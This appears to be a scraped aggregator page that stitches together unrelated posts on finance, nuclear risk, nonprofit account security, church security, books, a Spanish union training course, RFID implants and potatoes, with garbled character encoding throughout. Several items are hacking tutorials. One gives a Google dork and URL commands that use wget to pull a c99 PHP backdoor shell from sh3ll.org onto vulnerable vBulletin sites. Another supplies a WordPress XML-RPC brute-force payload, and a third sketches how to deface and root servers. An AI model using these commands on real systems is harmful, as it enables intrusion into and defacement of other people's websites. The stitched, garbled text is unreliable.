|(2017) - '..a deeply systemic debt crisis akin to the aftermath of 1929 .. the stage has now been set..' (no replies)|| '..But after a decade of unprecedented expansion of government debt and central bank Credit, the stage has now been set for a more systemic 1929-like financial dislocation.'|
'June 27 â Reuters (William Schomberg, Marc Jones, Jason Lange and Lindsay Dunsmuir): âU.S. Federal Reserve Chair Janet Yellen said on Tuesday that she does not believe that there will be another financial crisis for at least as long as she lives, thanks largely to reforms of the banking system since the 2007-09 crash. âWould I say there will never, ever be another financial crisis?â Yellen saidâ¦ âYou know probably that would be going too far but I do think we're much safer and I hope that it will not be in our lifetimes and I don't believe it will be,â she said.â
Context (Banking Reform - English/Dutch) '..a truly stable financial and monetary system for the twenty-first century..'
'Unsound Finance gets to the heart of the issue.'
|'We have no experience in stopping a nuclear war.' - Sidney Drell (no replies)|| '..My greatest concern is the lack of public awareness about this existential threat, the absence of a vigorous public debate about the nuclear-war plans of Russia and the United States, the silent consent to the roughly fifteen thousand nuclear weapons in the world. These machines have been carefully and ingeniously designed to kill us. Complacency increases the odds that, some day, they will. The âTitanic Effectâ is a term used by software designers to explain how things can quietly go wrong in a complex technological system: the safer you assume the system to be, the more dangerous it is becoming.'|
'The harsh rhetoric on both sides increases the danger of miscalculations and mistakes, as do other factors. Close encounters between the military aircraft of the United States and Russia have become routine, creating the potential for an unintended conflict. Many of the nuclear-weapon systems on both sides are aging and obsolete. The personnel who operate those systems often suffer from poor morale and poor training. None of their senior officers has firsthand experience making decisions during an actual nuclear crisis. And todayâs command-and-control systems must contend with threats that barely existed during the Cold War: malware, spyware, worms, bugs, viruses, corrupted firmware, logic bombs, Trojan horses, and all the other modern tools of cyber warfare. The greatest danger is posed not by any technological innovation but by a dilemma that has haunted nuclear strategy since the first detonation of an atomic bomb: How do you prevent a nuclear attack while preserving the ability to launch one?
|Tools: MassBleed - MassBleed SSL Vulnerability Scanner|
|Tools: Joomlavs - A black box, Ruby powered, Joomla vulnerability scanner|
|Tools: XVWA - Xtreme Vulnerable Web Application|
|Improve your nonprofitâs account security with 2-step verification|
While online accounts allow nonprofits to easily communicate with partners, volunteers and donors across the world, this shared network can also leave your account vulnerable to intruders. As your nonprofit continues to grow its online presence, itâs crucial to keep confidential information (e.g., finances or donorâs information) safe. While passwords have historically been the sole guardian for online account access, research from Google has shown that many passwords and security questions can easily be guessed. That's why we strongly recommend that all nonprofits using GSuite for Nonprofits, or Google products like Gmail, use 2-Step Verification (2SV) as an additional protection on their account(s).Â
Account hijackingâa process through which an online account is stolen or hijacked by a hackerâconstitutes a serious threat to your nonprofitâs operations. Typically, account hijackings are carried out by phishing attempts or hackers who guess weak passwords. Because of this, itâs especially important for your nonprofit to maintain strong and unique account passwords to keep sensitive data safe.
But 2SV goes beyond just a strong password. It's anÂ effective security feature that combines "something you know" (e.g., a password) and "something you have" (e.g., a text, a prompt, or a Security Key) to protect your accounts. Think of this like withdrawing money from an ATM/cash machine: You need both your PIN and your debit card.
Now that you know what 2SV is, head over to our Help Page to start improving your nonprofitâs online security now. (Quick tip: Remember to keep your account settings up to date and configure backup options to use if your phone is ever lost or stolen). Stay safe, nonprofits! Â
To see if your nonprofit is eligible to participate, review the Google for Nonprofits eligibility guidelines. Google for Nonprofits offers organizations like yours access to Google tools like Gmail, Google Calendar, Google Drive, Google Ad Grants, YouTube for Nonprofits and more at no charge. These tools can help you reach new donors and volunteers, work more efficiently, and tell your nonprofitâs story. Learn more and enroll here.
|Four ways to keep your nonprofit safe & secure online|
For nonprofits, the Internet serves as a powerful vehicle for change â creating a way to access information, connect with users, and drive innovation. But navigating the web can also be a tricky task. Online safety and security has become increasingly pertinent for all digital users, including nonprofits. While itâs relevant to all though, itâs unattended by many. This raises the question: âHow do we keep our nonprofit (and the community we serve) safe and secure online?â
Today, weâre partnering with Googleâs User Advocacy Group to share four smart tips to keep your nonprofit, your users, and you safe online.
1. Secure your passwords
Many of us âknowâ that itâs smart to pick a strong password, but out of convenience we also continue to use our favorite petâs name (e.g. âCliffordâ) or other not-so-creative passwords like âpassword.â Although pets like Clifford are great, they donât make great passwords. Rather, this weak protection creates vulnerable access to some of your nonprofitâs most sensitive information.
Picking strong passwords that are different for each of your accounts is extremely important -- itâs also good practice to update your passwords regularly. Â Check out the following tips:Â
2. Take the security checkup
Googleâs Security Checkup is a quick, easy way to review the following information about your account (and more)!
3. Understand your privacy settings
If you do your personal and business work on the same computer, you will want to also check your privacy settings through Googleâs Privacy Checkup. Privacy Checkup allows you to control what information like photos, videos and reviews are shared to the public or to whomever you choose.
Review important information about how Google uses data to make services better for you and your nonprofit.
4. Ensure you're switching between your personal & business accounts
We understand that as a nonprofit, you wear many hats and manage multiple business accounts in addition to personal ones. Google makes it easy toggle between accounts â visit your account settings to quickly determine which data youâre accessing, and rest easy knowing your personal and business information are separate.
Online security doesnât have to be difficult. These simple steps will give you peace of mind and protect your nonprofitâs valuable work. If you have any other online security questions or want to recommend a topic for a future blog, please add a comment below.Â
To see if your nonprofit is eligible to participate, review the Google for Nonprofits eligibility guidelines. Google for Nonprofits offers organizations like yours access to Google tools like Gmail, Google Calendar, Google Drive, Google Ad Grants, YouTube for Nonprofits and more â all at no charge. These tools can help you reach new donors and volunteers, work more efficiently, and tell your nonprofitâs story. Learn more + enroll here. Â
|HTTP Verb Tampering Demo/Example/Tutorial|
<div class="hreview"> <span class="item"> <span class="fn">HTTP Verb Tampering Demo/Example/Tutorial </span><br/> </span> Reviewed by <span class="reviewer">Rishal Dwivedi</span>on <span class="dtreviewed">Sep 21 2014<span title="YYYY-MM-DD" class="value-title"></span><br/> </span> Rating: <span class="rating">5</span></div>
What is HTTP Verb?
- List of some basic HTTP Verb or Methods
What is HTTP Verb Tampering?
It's a method to bypass a defense technique by tampering the verb. Some secret directories have restricted access by basic authentication. This directories are protected by the .htaccess file which can be easily exploited. This attack is a result of a Apache htaccess file misconfiguration .
An administrator, limits the access to the private resource or directory just via POST request method. See the vulnerable code below.
Here AuthUserFile is the directory to the .htpasswd file which contains the username & password in encrypted format.
<LIMIT GET POST>
It just limits the POST method & matches the credentials that saved in htpasswd file, if wrong error page shows up.
Here the administrator has limited POST method, but also not blacklisted other methods?. This means any requests via other method would lead the attacker having access to the protected private resources or directory. Below i have provided a video DEMO of successful exploitation of an HTTP Verb tampering vulnerability via Live HTTP Headers ( Firefox add-on) on AT&T sub domain (Reported & Fixed). In the next post i will be showing you various ways to fix or apply a patch to this vulnerability .
|Wordpress XML-RPC Brute Force Attack Vulnerability|
Today i'll be sharing a easy & quite interesting tutorial on Wordpress XML-RPC Brute Force Attack.
As we all know nowadays when every an attacker gets his hands on a WordPress website, the first thing he would try to do in order to compromise the website is a brute force attack. The attacker loads a list of user & password combination in order to guess the correct one. Its always the first & mandatory option to try in point of view of a newbie attacker. The result of an increase in brute force attack day buy day, the developers have started using Login captcha plugins to protect them selves form such attack.
XML-RPC is a word press interface & this functionality is turned by default since WordPress 3.5. Recently we have seen very critical vulnerability been found in the same which effected a quarter of the internet - Ping Back DDOS Vulnerability, Arbitrary code Execution etc. Recently it has came to known that attackers are taking advent of the XML-RPC wp.getUsersBlogs method in order to launch a brute force attack against the website. In XML-RPC many of the calls need the credentials in order to implement. Then attacker can try different combinations on user & passwords. The output is thrown on the webpage weather its valid or invalid.
Step by step guide -
- Locate the XMLRPC on the target website - localhost/xmlrpc.php
- Send a POST request with the following code given below.
<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value> <string>user</string></value></param> <param><value><string>password</string></value></param></params></methodCall>
- Check the response
If wrong combination - faultCode
If right - isAdmin
Hope you all liked this tutorial. Any queries? Drop it down in comments!.
|iOS Update Quashes Dangerous SSL Bug|
Photo by: Duncan Hull
If you haven't gotten the iOS 7.0.6 update, you need to stop what you're doing and get it now. There's a dangerous SSL bug that can hurt you in numerous ways if you don't take care of it right away by updating your Apple operating system. Even if you have an older version, you're going to want to make sure you're protected and have the latest OS available for your particular mobile device.
Back in February of this year, it came out that not updating could lead to bad people being able to read and modify encrypted communications whether people were using iPhones, iPads or other iOS devices. As you might imagine, this upset a lot of people. The good news is that Apple was pretty quick at making sure an update was available for people who downloaded it.
And yet that's part of the problem - not everyone updates their operating system on their own, especially on their phone or mobile device. Some people have claimed that it wasn't a flaw and was built-in iOS as a means for people - like the NSA perhaps - to be able to spy on people easier. Apple denied the claims, of course, but if you Google around, you're going to find some interesting speculation about the "flaw" found in iOS.
According to Ars Technica, the problem may have gone beyond iOS mobile devices and actually affected Mac OS X users - even if they had all the current patches and updates installed! According to them, "[The] vulnerability has been confirmed in iOS versions 6.1.5, 7.0.4, and 7.0.5, and OS X 10.9.0 and 10.9.1." That's quite a wide vulnerability. And while Apple seemed to be working fast to squash the bug last month, there's a good chance that a lot of people still don't have it patched.
In order to make sure you stay safe, here are some specific tips you should follow.
While there's no guarantee your mobile devices are going to be safe and secure, you want to make sure you take whatever steps you can to guarantee that you're as safe as possible. If you have any thoughts or opinions about the latest iOS update that killed some major security flaws, feel free to leave a comment below and let us know what you're thinking.
Written by: Jenny Corteza has used a City Directory Theme because it made her life as a writer a whole lot easier. She's been writing technology articles for many years now.
|What is Remote Code Execution? How to Hack Websites|
According to Wikipedia, Remote Code Execution can be defined as âIn computer security, arbitrary code execution or remote code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shell code to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code executionâ
vBulletin RCE Injection
Few websites running vBulletin are vulnerable to Remote Code Execution, by exploiting the vulnerability we can get our PHP backdoor shell uploaded on the website. Weâll use a dork to find the vulnerable website.
Note: Donât keep yourself restricted when it comes to using dorks, use other search engines too other than Google, like Bing, Yahoo etc. Use of multiple search engines will help you to get more vulnerable websites.
Dork: inurl:faq.php & intext:"Warning: system() [function.system]"
Now, select any website of your choice from th search result, and go to its faq.php page. If the website is vulnerable, you will get the following on the page.
You will get an error similar to Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1
So, firstly upload your PHP shell on any free hosting website or you can use sh3ll.org/c99.txt as it has already got an uploaded .txt shell. (We will be first uploading our shell in .txt form, and later will be changing the extension to .php after the upload process is completed.
Suppose the vulnerable website is http://www.vulnerable.com/faq.php. So in order to upload our shell enter the following in the URL bar:
http://www.vulnerable.com/faq.php?cmd=cd /tmp;wget http://sh3ll.org/c99.txt
To check if we were able to successfully upload our shell, enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;ls -la c99.txt
Were c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page. (Might be a little different in some cases)
-rw-rârâ1 nobody nobody
We know that our shell is successful uploaded on the website, now itâs time to change the file format from .txt to .php in order to execute it on the server.
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)
Now, the file format is change. Itâs time to execute our shell, so to execute it enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
Bingo!! We successfully exploited vBulletin Remote Code Execution Vulnerability.
|How To Deface Websites?|
Everyone who is new to hacking, the first thing that they want to learn is how to deface a website, root the server or how to crack cPanels of the website. In this post I will be telling you how hackers manage to break into a website- deface it, symlink it, root the server etc.
So let's start.
SQL Injection is one of the most widely and commonly used method for hacking and breaking into the website. For performing SQL Injections attacks, manual approach as well as automated tool approach can be used. You can find SQL Vulnerable sites from here
For Automated SQL Injection
SQL Injection using Havij Automated Tool
SQL Injection through SQL Map
SQL Injection with you Android Phone
Download Havij Pro version from here
For Manual SQL Injection
Manual SQL Injection
Hack Admin Panel of a Website with SQL Injection
Hacking a Website on Shared Server.
Suppose you have a website which is hosted on the server with an IP address 192.168.1.4 and you want to shell this server and have to access a particular site and deface it.
So to accomplish this task you can use bing, Learn it from here
Broke into the admin panel? confused now what to do?
Now, you are finally into the administrator panel of the website. Now you next task is to upload a shell. So for that find a upload forum, and shell it with Live HTTP headers, learn this from here.
Sometimes server security is tight so it is difficult to get you shell executed. If you face any similar kind of problem, here is the solution.
To upload you shell on Joomla refer to the post -> How to Upload You Shell on Joomla
for Wordpress go here -> Upload You Shell on Wordpress
Learn hacking wordpress and joomla sites from here
You got your shell up on the server. Now you can simply deface it. Root the server, mass deface it. symlink it.
How to root a server
How to crack cPanel
How to mass deface
Mass defacing script
How to Symlink
Got doubts? Comment below and get you query solved.
|Basics Of Wi-Fi Security|
Hi all today i am just going to discuss how you can secure your wifi network from hackers. you must have came across many tips on securing wifi network from various blogs and all but here we will discuss from a hackers point of view and all practical and genuine approach to securing Wi-Fi network so lets begin.
|Fixing/Patching DVWA Remote command Execution vulnerability|
Hi readers! its me Rishal. It's been so long since i have posted any good tutorial, so today i will be showing you all something new & interesting which is "Fixing DVWA Remote command Execution vulnerability". Let's get started.
Step by Step Guide:
Now once the command gets executed you should get a result showing some volume info & the files in the current directory as shown in the below image.
As you can see in the source code there is "NO" filtration for the data entered by the user, therefore allowing the attacker to pass arbitrary commands. To implement a fix we will have to add a filtration to the data entered by the user in the field.
The Fix :
|How to Hack Websites Using Android Mobile Phones|
Hello everyone, today I will be teaching you how to hack a website using your android phones. Surprised and you might be thinking how's it possible to hack using your android mobile phone. Mostly 70% of the websites which are defaced by the hackers are done using the most common vulnerability i.e. SQL Injection.
We will be using an application called DroidSQLi to hack SQL injection vulnerable websites with our phone. So all we need are 3 things.
1.) DroidSQLi application installed on our android phone
2.) SQLi vulnerable website
3.) and obviously an android phone.
Learn How to Hack Android Phones Here
Let's get started, first of all download DroidSQLi Tool. It is an first automated SQL Injection exploitation tool for mobile phones. It supports the following type of injections.
Union Based Injection
Error Based Injection
Time Based Injection
All you need to do is enter the vulnerable website under Target URL and press on inject button. It will automatically select the best possible injection.
|Arbitrary or Unrestricted File Upload|
Arbitrary or Unrestricted File Upload is a type of web application vulnerability which occurs due to improper validation of the file which is being uploaded on the server.
So in this post I will be explaining you how this vulnerability is caused by studying the source code. This post has been written keeping in mind that you are new to this type of vulnerability, so examples which will be explained will be basic ones. Advanced example will be posted in PART 2 of this post.
The following is an HTML upload forum which allows pictures to be uploaded on the server.
<form action="upload.php" method="post" enctype="multipart/form-data">
Choose a file to upload:
<input type="file" name="filename"/>
<input type="submit" name="submit" value="Submit"/>
When the file is submitted, it is send to upload.php on the server. The file is been stored in a temporary location until it is retrieved by the server side code. So after the file is uploaded, it is sent to a permanent directory or location through upload.php
// Define the target location where the picture being
// uploaded is going to be saved.
$target = "pictures/" . basename($_FILES['uploadedfile']['name']);
// Move the uploaded file to the new location.
echo "The picture has been successfully uploaded.";
echo "There was an error uploading the picture, please try again.";
The problem with the above code is that, the file type is not verified which is being uploaded, as a result an attacker can upload a malicious file on the server.
Once the malicious file is uploaded on the server, arbitrary command execution is possible.
Well, a simple solution to patch this type of problem is to check for MIME type in the uploaded request.
Some File Upload Vulnerabilities :
|Best Security apps to Protect your smartphone from Hackers||The iOS system on iPhones and iPads is very reliable and isn’t thatÂ vulnerable for viruses, malware and hackers as Android is. However, no operating system is 100% hacker-proof. This is why it is wise to install some applications that can help you prevent attacks from hackers. Below we created a short list of applications that […]|
|âQuizÃ¡ proceso de focalizaciÃ³n causÃ³ estancamiento en reducciÃ³n de la desnutriciÃ³n y anemia infantilâ||La ministra de la Mujer y Poblaciones Vulnerables, Ana Jara, participÃ³ en el encuentro Alerta Ciudadana por la Primera Infancia. En este diÃ¡logo destaca como âun espacio de acuerdosâ este encuentro organizado por el Grupo Impulsor InversiÃ³n en la Infancia y la Asamblea Nacional de Gobiernos Regionales, y responde por quÃ© ha disminuido el ritmo de reducciÃ³n de la desnutriciÃ³n crÃ³nica entre los niÃ±os menores de cinco aÃ±os y se ha incrementado la anemia infantil.|
|Protecting Our Houses of Worship: Guest Column by Security Expert / Retired NYPD Detective Sergeant|
By ALAN SCHISSEL
Founder & Chief Executive Officer
This, of course, was followed by another unprecedented press conference by our President during which two reporters were moved to ask Mr. Trump about the rise in anti-Semitism. Many of us were aghast at the Presidentâs rude and dismissive response, and his unwillingness to address the question seriously. The fact is, the country is experiencing an alarming increase of anti-Semitic incidents, and this has been trending upward since 2015. A security report issued by the Department of Homeland Security on protecting houses of worship stated that the United States has approximately 345,000 religious congregations representing 230 denominational groups and roughly 150 million members. Despite being sanctuaries from the troubles of the world, houses of worship have also been targets as violence has spiked across the country in recent years. The killing of nine people at Emanuel A.M.E. Church in Charleston, South Carolina was the largest mass shooting in a house of worship since 1991, when nine people were shot at the Wat Promkunaram Buddhist temple in Waddell, Arizona, northwest of Phoenix.
[Under relentless pressure, the President subsequently denounced anti-Semitism.]
The intent of this column is to generate awareness and provide a short guide which contains security practices for religious institutions, parishioners and our non religious communities to help deter threats, mitigate hazards and risks, and minimize the damage caused by an incident in or around a house of worship, including mass casualty events.
Identifying Your Threats & Vulnerabilities
Identifying and evaluating a known or potential threat to a given facility is the first step of a security assessment. The results of which will guide the process of developing a security plan. A proper readiness plan will aim to deter a threat or mitigate a threat by reducing the religious facilityâs vulnerability to those threats.
Natural Hazards vs. Targeted Violence
As stated before, all life safety solutions should be designed using a blended approach to managing risk. Protecting a religious facility means your emergency management plan(s) must address an all-hazard approach to both natural hazards, e.g., infectious diseases and illnesses, fire, and seismic and weather-related events (hurricanes, tornadoes, flash floods) as well as targeted attacks. Spontaneous and pre-planned attacks are likely to occur by individual(s) who use firearms; improvised explosive devices (IEDs); vehicle-borne improvised explosive devices (VBIEDs); chemical, biological, or radiological attacks; or arson in order to inflict a number of casualties and damage to religious facilities.
As previously mentioned earlier, a house of worship environment is managed by creating layers of protective measures in collaboration with state and local partners that allow religious institutions to deter, detect and delay threats. These layers also allow an institution to consider a threat as soon as possible and to more effectively respond to, further deter, eliminate or mitigate that threat.
â¢ Technological sensors such as CCTV surveillance cameras or alarms (fire, smoke, wind, and intrusion detection) will trigger informed decision-making.
â¢ Barriers, such as locked doors or fixed barriers or uniform security personnel should be in place to deter or delay a threat and afford more time for effective decision making.
â¢ Having the correct inbound and outbound communication network in place will influence a number key decisions. Time, or the lack of time, is a principle disrupter of effective decision-making. Sound communication strategies such as emergency email blasts, voice activated alert systems, and silent alert systems help to improve response to and during a crisis. An effective communication protocol should expand the window of time available to leaders to make sound decisions.
Additional Measures to Consider:
â¢ Reporting Procedures
â¢ Establishing Collaborative Planning Teams
â¢ Starting an Emergency Operations Plan
â¢ Define Roles and Responsibilities
â¢ Notification Procedures
â¢ Evacuation Lockdown and ShelterâInâPlace Policies and Procedures
â¢ Plans for Diverse Needs of Children and Staff
â¢ Necessary Equipment and Supplies
â¢ Common Vocabulary
â¢ Emergency Drills
Call us at (212) 808-4153, or write us to tell what you think or how we can be of more assistance and remember, always dial 911 first in an emergency!
Cool Justice Editorâs Note: By way of disclosure, Cool Justice is an occasional denizen of Integratedâs Hartford office and once in a while even does a little work â¦
|Dean Koontz's "Moonlight": how a commercially prolific suspense novelist remains relevant as technology and politics change|
During my first year of employment at USLICO in Arlington in 1990 (what would become my last main job, for 12 years and four owners), I read the Dean Koontz 1989 novel âMidnightâ, and shared it (paper, Putnam was original publisher) with a few people in production control in what would become a coffee break book club.
The novel is remarkable in its huge number of chapters, and organization into three parts each with its own chapter 1.
The novel starts with a jogger running in a California beach town (Moonlight Cove -- âIn the Moonlight, Do Meâ indeed) being attacked by a mysterious alien-like creature, and soon the mystery, somewhat in a âTwin Peaksâ -like fashion, is examined from the viewpoint of various characters, whose narratives gradually connect. (Irving Wallace had used this technique for building plots for Cold War spy novels back in the 1960s). It seems as though people are getting converted into hybrid creatures and that a sociopathic computer scientist Shaddock is involved.
I would have thought that this novel would make a good miniseries on a cable channel,, even today, as the premise has less dependence on political circumstances and even technology than most sci-fi suspense novels. Koontz sometimes gets into Shaddackâs head, anticipating the psyche of a modern terrorist, deflecting the social issues (like gay rights in one passage) in surprising ways.
I mention the novel because Koontz is often heralded in some circles as the ideal author who writes strictly to sell, and he indeed has a huge career of a long list of novels, divided into various subcategories of suspense. Literary agents love his approach, because it is so commercial. So do trade publishers.
One problem with developing suspense novels is that sometimes they become very vulnerable to changes in world politics, which can come suddenly and be largely unexpected by suspense authors, like the fall of the Soviet Union at the end of 1991. Today itâs not clear who is the biggest threat: North Korea, Iran, ISIS, Russia, China.
Iâve had that problem, and my own approach to fiction has to start with my own narrative first. I make no apologies, despite the disruptive advice and sales calls from others.
|Time: "Innocent: The Fight Against Wrongful Conviction"|
Time has a Special Edition âInnocent: The Fight Against Wrongful Convictionsâ, :25 Years of the Innocence Projectâ, 96 pages, heavily illustrated, many writers.
There are seven chapters, each with several essays. The first one starts with the wrongful conviction f a man for a brutal robbery and murder of a money order salesman in Cleveland in 1975.
One of the biggest topics is DNA evidence. But it has been surprisingly difficult to get cases retried with new DNS evidence, Politically motivated prosecutors or the police entice confessions out of vulnerable defendants, especially from child witnesses in sex cases.
There is some attention to forgiveness and to reparations.
Chapter Six contains an excerpt from âGhost of the Innocent Manâ by Benjamin Rachlin, this excerpt focused on the Center for Actual Innocence in North Carolina.
The book should be interesting to filmmakers Andrew Jenks and Ryan Ferguson (who was himself unjustly convicted of second degree murder in Missouri and got out after 10 years (Andrew Jenksâs film âDream/Killerâ, Movies, Jan. 22, 2016), and the MTV series "Unlocking the Truth".
|Proyecto de Curso de CapacitaciÃ³n y ActualizaciÃ³n Sindical|
La continua capacitaciÃ³n de los hombres y mujeres que representan a los obreros en las distintas plantas de empaque de
No nos precede experiencia en esta Ã¡rea y serÃ¡ necesario mucho esfuerzo, colaboraciÃ³n y participaciÃ³n de todos los que tenemos algÃºn grado de responsabilidad en la representaciÃ³n de los trabajadores, esto asÃ porque la defensa de los derechos de los obreros de la fruta a sido y serÃ¡ un compromiso que hemos asumido, y que asÃ lo hicimos porque tenemos vocaciÃ³n de servicio.
Para lograr esta meta, y advirtiendo que
Esperamos lograr, a travÃ©s de esta mancomunaciÃ³n de esfuerzo e ideales, mejores representantes gremiales y, en el proceso, mejores ciudadanos.
ComisiÃ³n Directiva Sindicato de
ComisiÃ³n Directiva- AsociaciÃ³n Civil âGestar, promoviendo el desarrollo humano"
En los tiempos que corren se hace cada vez mÃ¡s necesaria la capacitaciÃ³n gremial, pues muchos de los delegados y demÃ¡s dirigentes actÃºan en base a sus propias experiencias, la que lleva a un aprendizaje de prueba y error, y cuando se cometen errores en la defensa de los derechos laborales, los Ãºnicos perjudicados son los trabajadores que ven vulnerados sus derechos sociales. Con esto no queremos menospreciar la experiencia, pero a esto en necesario sumarle otros conocimientos.
AsÃ, se hace cada vez mÃ¡s importante el acceso al conocimiento, pues este constituye un valor central, una necesidad y un derecho inalienable de los trabajadores. El conocimiento, en la hora actual, tiene un peso decisivo en la discusiÃ³n con las empresas en la defensa de los intereses de los compaÃ±eros trabajadores del empaque.
El conocimiento es una herramienta indispensable, y se constituye en condiciÃ³n para pensar, proponer, defender y concretar estrategias de polÃtica sindical, educaciÃ³n no formal y acciÃ³n social.
En el marco de este proyecto de capacitaciÃ³n, que en principio apunta a lo sindical o gremial, nos proponemos como meta, que sea mucho mÃ¡s amplio y abarcativo, ya sea en cuanto a los temas a desarrollar como tambiÃ©n a los destinatarios; pensada para brindar posibilidades de acceso a todos aquellos a quienes la deseen, basÃ¡ndose en la solidaridad, la unidad y el reconocimiento de las experiencias previas de cada uno de los representantes de los obreros del empaque. De esta forma es posible integrar y reconciliar a los trabajadores de la fruta con su Sindicato.
TambiÃ©n es necesario que la capacitaciÃ³n reconozca la diversidad y la diferencia de niveles y experiencias que traen los trabajadores, para de esta forma poner en prÃ¡ctica un principio bÃ¡sico de la sociedad: la igualdad de oportunidades.
Con este Curso de CapacitaciÃ³n Gremial buscamos dar respuesta a la necesidad de contar en los lugares de trabajo, con delegados que sepan representar los intereses de sus compaÃ±eros mostrando la solvencia necesaria para estar a la altura de la compleja realidad que presentan actualmente las relaciones laborales.
En esta primera etapa, la meta general es que quienes representan a los trabajadores estÃ©n preparados desde todos los aspectos (capacidad para negociar, asesorar, debatir, criticar, proponer, etc.) para realizar la tarea para la que sus propios compaÃ±eros lo han elegido.
El objetivo que se propone es:
Sede Gremial del Sindicato de Obreros Empacadores de Frutas de RÃo Negro y NeuquÃ©n de esta Seccional, sito en calle Misiones 1675 de General Roca.
Se harÃ¡ a travÃ©s de seminarios, cursos o talleres, siendo este Ãºltimo el mÃ©todo mÃ¡s propicio para que puedan darse una serie de intercambio de conocimientos y experiencias entre los participantes. Los encuentros se realizaran los dÃas sÃ¡bados, cuyas fechas tentativas estÃ¡n especificadas en el Programa Curricular, con una duraciÃ³n de 3 1/2 (Tres y media) horas reloj por encuentro, totalizando 42 horas al finalizar el Curso, haciÃ©ndose entrega del certificado correspondiente.
Los beneficiarios directos de estos encuentros de capacitaciÃ³n serÃ¡n unas 65 personas entre delegados e integrantes de ComisiÃ³n Directiva.
Los trabajadores representados por los asistentes, calculados en mÃ¡s de 2.500 trabajadores.
PROGRAMA CURRICULAR (con fechas tentativas de cursado)
PRIMER MODULO: INTERPRETACION DE RECIBOS DE SUELDO Y ACUERDOS DE PRODUCTIVIDAD. (01-08-09)
SEGUNDO MODULO: 1ra Parte: CONVENIO COLECTIVO DE TRABAJO: CONCEPTO Y ALCANCES. LEYES APLICABLES. (15-08-09)
2da Parte: CCT 1/76: PARTES INTERVINIENTES, VIGENCIA Y AMBITO DE APLICACIÃN. REINCORPORACION DEL PERSONAL. SUSPENSIÃN FIN TEMPORADA. PAGO SUELDOS E ITEMS QUE LO INTEGRAN. FALLOS. (29-08-09)
3ra Parte: CCT 1/76: NORMAS APLICABLES A POST-TEMPORADA. DERECHOS Y OBLIGACIONES DE LOS OBREROS, DE LAS EMPRESAS Y DE LOS DELEGADOS. FALLOS. DESACTUALIZACION CCT 1/76. (12-09-09)
TERCER MODULO: TECNICA DE NEGOCIACIÃN. (26-09-09)
CUARTO MODULO: NEGOCIACIÃN COLECTIVA O PARITARIA: NOMINACION DE PARITARIOS Y MANDATO DE LOS MISMOS. ALCANCES DEL ACUERDO. CONCILIACION OBLIGATORIA. LAUDO ARBITRAL. (03-10-09)
QUINTO MODULO: MEDIDAS DE ACCION DIRECTA. CLASES Y DIFICULTADES EN CADA CASO. CAPACIDAD DE LIDERAR Y DE NEGOCIAR. (17-10-09)
SEXTO MODULO. SINDICATO DE
SEPTIMO MODULO: EVOLUCION DE LOS DERECHOS DEL TRABAJADOR. CONSTITUCION NACIONAL, PROVINCIAL Y LCT. (14-11-09)
OCTAVO MODULO: ACCIDENTES DE TRABAJO. LEY APLICABLE. OBLIGACIONES DE
NOVENO MODULO: SEGURIDAD SOCIAL: HISTORIA, ALCANCES Y VIGENCIA. ANALISIS DE CADA UNO EN EL MARCO DE LOS OBREROS DE
CERTIFICADOS: Se extenderÃ¡n certificados a quienes hayan cumplido con el 70% de asistencia.
EXPOSITORES: Cada uno de los temas serÃ¡ abordado por profesionales y/o personas idÃ³neas en cada una de las temÃ¡ticas a desarrollar.
FORMULACION, COORDINACION Y ORGANIZACIÃN: Lo realizarÃ¡
ComisiÃ³n Directiva Sindicato de
ComisiÃ³n Directiva- AsociaciÃ³n Civil âGestar, promoviendo el desarrollo humanoâ
|US company to offer microchip implants to employees||
Over the past few years, the security industry has begun to embrace many new technologiesârobotics, the cloud, biometrics, for exampleâbut one company here in the U.S., Three Square Market, is pushing the boundaries of RFID technology by offering to implant tiny RFID chipsâthe size of a grain of riceâinto its employeesâ hands between the thumb and forefinger.
The chip would allow employees to not only buy snacks in the break room but also have their hands function as a mobile key to gain access to the building and other doors, which makes me think of the possible applications/ramifications within security.
Implanting chips in employeeâs hands is already being done in Sweden, where an organization named Epicenter is having success with an increasing number of employees there opting to get the implant. Here in the U.S., Three Square Market says it has approximately 50 employees who are interested in getting the implant, and unlike in Sweden, the company is paying for the $300 procedure for its employees. Three Square Market partnered with a Swedish firm, BioHax International, to make the chip and is planning to sell the technology to other companies.
"Eventually, this technology will become standardized, allowing you to use this as your passport, public transit, all purchasing opportunities, etc.," chief executive Todd Westby wrote in a blog post announcing the program, noting that there is even potential for storing medical/health information, and for use as payment at other RFID terminals.
But one has to wonder what security vulnerabilities this could create, especially in protecting the data on that chip from being hacked, stolen and/or compromised, etc. Not to mention, the âcreepyâ factor here, as mass adoption of microchip implants is dubious, at best.
Maybe some day, like in the year 2112, but in the short term, I do think there is good fodder here for a futuristic sci-fi movie.
|It's Spud Time|
The United Nations wants more people to appreciate the potato's potential to fight world hunger
Food for Thought
As 2007 winds down, thoughts naturally turn towards what might lie ahead. Meals rich in high-carb tubers, perhaps? That's what the United Nations would like everyone to contemplate throughout 2008, which it is designating the International Year of the Potato.
Farmers now harvest more than 300 million tons of potatoes (Solanum tuberosum) worldwide. That makes it the fourth biggest food crop, trailing only corn, wheat, and rice.
For 8,000 years, the humble potato has been a staple in the South American Andes, its homeland. Spanish adventurers encountered the New World crop roughly 500 years ago and brought various types back to Europe. Today, potatoes are cultivated not only throughout the Americas, but also from China's uplands to India's subtropical lowlandsâeven on Ukraine's arid steppes.
A testament to the potato's Western roots, production of this crop in the States and southward leads the world. Fully 40 percent of the 2006 potato harvest came from North America, with Latin American farmers contributing another 16 percent.
However, appreciation for this nutritious starch within developing countries outside of the Americasâespecially in Asiaâhas been growing steadily, with production of the crop in those regions climbing some 5 percent annually. Indeed, 2005 marked the first time in recent history that production of potatoes in the developing world exceeded that in developed nations.
